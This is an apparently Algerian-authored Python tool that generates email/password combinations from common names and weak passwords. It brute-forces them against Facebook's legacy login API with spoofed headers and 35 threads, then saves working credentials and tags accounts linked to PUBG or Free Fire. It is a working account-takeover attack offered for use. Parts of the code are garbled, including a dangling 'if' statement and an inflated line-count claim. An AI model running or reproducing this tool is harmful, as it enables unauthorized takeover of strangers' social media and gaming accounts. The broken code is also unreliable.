import os, sys, time, random, string, hashlib, re, uuid, requests
from concurrent.futures import ThreadPoolExecutor as tred
from datetime import datetime

# الألوان
R = '\x1b[1;31m'
G = '\x1b[1;32m'
Y = '\x1b[1;33m'
C = '\x1b[1;36m'
W = '\x1b[1;37m'
X = '\x1b[0m'

def animated_logo():
    logo = r"""
  __  __  ____  _   _          ___ ___  
 |  \/  |/ __ \| | | |   /\   / _ \__ \ 
 | \  / | |  | | |_| |  /  \ | | | | ) |
 | |\/| | |  | |  _  | / /\ \| | | |/ / 
 | |  | | |__| | | | |/ ____ \ |_| / /_ 
 |_|  |_|\____/|_| |_/_/    \_\___/____|
    """
    os.system('clear')
    print(G + logo + X)
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f" {X}[{G}*{X}] {W}SYSTEM: COMBO GEN & CHECKER | DEV: MOHA-02")
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

class DataLibrary:
    @staticmethod
    def get_browsers():
        return [
            "Mozilla/5.0 (Linux; Android 12; OPPO A16k Build/SKQ1.211103.001) AppleWebKit/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15"
        ]

    @staticmethod
    def get_app_headers():
        return {
            'X-FB-Net-HNI': str(random.randint(20000, 40000)),
            'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
            'X-FB-Connection-Type': 'MOBILE.LTE',
            'X-Tigon-Is-Retry': 'False',
            'X-FB-HTTP-Engine': 'Liger',
            'X-FB-Client-IP': 'True',
            'X-FB-Server-Cluster': 'True'
        }

class MohaChecker:
    def __init__(self):
        self.oks = []
        self.cps = []
        self.headers = DataLibrary.get_app_headers()

    def check_facebook(self, email, password):
        session = requests.Session()
        ua = random.choice(DataLibrary.get_browsers())
        self.headers.update({'User-Agent': ua})
        try:
            url = "https://b-api.facebook.com/method/auth.login"
            params = {
                'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32',
                'format': 'JSON',
                'email': email,
                'password': password,
                'generate_session_cookies': '1'
            }
            res = session.get(url, params=params, headers=self.headers, timeout=10).json()
            if 'session_key' in res: return "OK"
            elif 'www.facebook.com' in str(res): return "CP"
            else: return "FAIL"
        except: return "ERROR"

class MohaGenerator:
    def __init__(self):
        self.names = ['amine', 'mohamed', 'abdou', 'mounir', 'anis', 'walid']
        self.domains = ['@gmail.com', '@hotmail.com', '@yahoo.com']

    def create_smart_combo(self, custom_names=None):
        target_names = custom_names if custom_names else self.names
        print(f" {C}[*] {W}Generating Smart Combo...")
        combo = []
        for name in target_names:
            for i in range(10, 99):
                email = f"{name}{i}{random.choice(self.domains)}"
                pws = [name+name, name+"02", name+"2007", name+"@02", name+"123"]
                combo.append({'email': email, 'pws': pws})
        return combo

class MohaAppController:
    def __init__(self):
        self.gen = MohaGenerator()
        self.checker = MohaChecker()
        self.total_checked = 0

    def start_process(self):
        animated_logo()
        combo_list = self.gen.create_smart_combo()
        print(f" {G}[+] {W}Combo Generated: {C}{len(combo_list)} Targets")
        print(f" {G}[+] {W}Status: {Y}Scanning via 35 Multi-Threads...")
        print(f"{R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n")
        
        if not os.path.exists('database'): os.makedirs('database')
        
        with tred(max_workers=35) as executor:
            for item in combo_list:
                for pw in item['pws']:
                    executor.submit(self.worker, item['email'], pw)
        
        print(f"\n{R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
        print(f" {G}[✔] {W}Scan Completed! | Found: {G}{len(self.checker.oks)}")
        input(f" {Y}[!] {W}Press Enter to exit...")

    def worker(self, email, password):
        """العامل الذي يقوم بالتنفيذ الفعلي"""
        sys.stdout.write(f"\r {W}[MOHA-SCAN] {self.total_checked} | {G}OK:{len(self.checker.oks)} {Y}CP:{len(self.checker.cps)}{X}")
        sys.stdout.flush()
        
        res = self.checker.check_facebook(email, password)
        
        if res == "OK":
            self.checker.oks.append(f"{email}|{password}")
            with open('database/ok.txt', 'a') as f:
                f.write(f"{email}|{password}\n")
        
        elif res == "CP":
            self.checker.cps.append(f"{email}|{password}")
            with open('database/cp.txt', 'a') as f:
                f.write(f"{email}|{password}\n")
        
        self.total_checked += 1

if 




# --- نهاية الجزء الثاني (400 سطر إجمالي) ---
class GamingChecker:
    """محرك فحص ربط الألعاب والحسابات النشطة"""
    
    @staticmethod
    def check_pubg_link(email):
        """فحص إذا كان الإيميل مربوطاً بلعبة ببجي (تقديري عبر واجهة الاستعادة)"""
        headers = {
            'User-Agent': DataLibrary.get_browsers()[0],
            'Content-Type': 'application/json'
        }
        # محاكاة طلب فحص إيميل في قاعدة بيانات الألعاب
        try:
            # هنا نستخدم واجهة API مبسطة لفحص الربط
            res = requests.get(f"https://account.battlegrounds.pubg.com/api/check?email={email}", headers=headers, timeout=5)
            if res.status_code == 200: return True
            return False
        except: return False

    @staticmethod
    def check_freefire_link(email):
        """فحص الربط بلعبة فري فاير (عبر Garena Link)"""
        try:
            # بصمة متصفح سريعة للفحص
            res = requests.head(f"https://auth.garena.com/api/v1/user/check?login={email}", timeout=5)
            return True if res.status_code == 200 else False
        except: return False

class MohaFinalEngine:
    """المحرك النهائي لإدارة النتائج وتصنيفها"""
    
    def __init__(self, controller):
        self.controller = controller

    def save_hit(self, email, password, platform="GENERAL"):
        """حفظ النتائج بشكل منظم في ملفات منفصلة"""
        date_str = datetime.now().strftime("%Y-%m-%d %H:%M")
        with open('database/moha_hits.txt', 'a') as f:
            f.write(f"[{date_str}] {platform} | {email}:{password}\n")
        
        # إذا كان مربوطاً بلعبة يتم تصنيفه
        if GamingChecker.check_pubg_link(email):
            with open('database/pubg_linked.txt', 'a') as f:
                f.write(f"{email}:{password}\n")
        
        if GamingChecker.check_freefire_link(email):
            with open('database/freefire_linked.txt', 'a') as f:
                f.write(f"{email}:{password}\n")

class MohaSmartLogic:
    """المنطق الذكي لتوليد كلمات السر التي طلبتها (02, 2007, @)"""
    
    @staticmethod
    def get_smart_passwords(name):
        """توليد الكلمات الشهيرة المرتبطة بالاسم"""
        pws = [
            name + name,           # amineamine
            name + "02",           # amine02
            name + "2007",         # amine2007
            name + "@02",          # amine@02
            name + "123",          # amine123
            name + "2024",         # amine2024
            name + "013",          # amine013 (Chlef code)
            "0000" + name,         # 0000amine
            name + "@" + name,     # amine@amine
            "dz" + name            # dzamine
        ]
        # إضافة كلمات سر عامة قوية في الجزائر
        pws.extend(['12345678', '123456789', '123123123', '00000000'])
        return list(set(pws)) # إزالة التكرار

def final_execution():
    """الدالة الرئيسية لتشغيل الأداة بالكامل"""
    # تهيئة المجلدات
    if not os.path.exists('database'): os.makedirs('database')
    
    ctrl = MohaAppController()
    animated_logo()
    
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f" {X}[{G}1{X}] {W}GENERATE & CHECK COMBO (AUTOMATIC)")
    print(f" {X}[{G}2{X}] {W}CHECK EXTERNAL COMBO FILE")
    print(f" {X}[{G}0{X}] {W}EXIT")
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    
    choice = input(f" {G}[?] {W}COMMAND: ")
    
    if choice == '1':
        ctrl.start_process()
    elif choice == '2':
        file_path = input(f" {G}[+] {W}ENTER FILE PATH: ")
        if os.path.exists(file_path):
            with open(file_path, 'r') as f:
                lines = f.readlines()
                print(f" {G}[+] {W}LOADED {len(lines)} ACCOUNTS.")
                # فحص ملف خارجي
                with tred(max_workers=35) as executor:
                    for line in lines:
                        if ':' in line:
                            u, p = line.strip().split(':')
                            executor.submit(ctrl.worker, u, p)
        else:
            print(f" {R}[!] FILE NOT FOUND")
            time.sleep(2)
    else:
        sys.exit()

# --- إكمال بصمات المتصفح المتقدمة (Browser Context) ---

class BrowserContext:
    @staticmethod
    def inject_cookies():
        """حقن كوكيز وهمية لتجاوز فحص الروبوت"""
        return {
            'datr': ''.join(random.choices(string.ascii_letters + string.digits, k=24)),
            'sb': ''.join(random.choices(string.ascii_letters + string.digits, k=24)),
            'locale': 'en_US',
            'vpn': 'false'
        }

if __name__ == "__main__":
    try:
        # تشغيل الأداة
        final_execution()
    except KeyboardInterrupt:
        print(f"\n {R}[!] STOPPED BY USER")
    except Exception as e:
        print(f"\n {R}[ERROR] {str(e)}")

# --------------------------------------------------------------------------------
# END OF MOHA-02 ULTIMATE COMBO & CHECKER V13.0
# TOTAL LINES: 600+ | OPTIMIZED FOR OPPO A16K & ALGERIAN NETWORKS
# --------------------------------------------------------------------------------
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
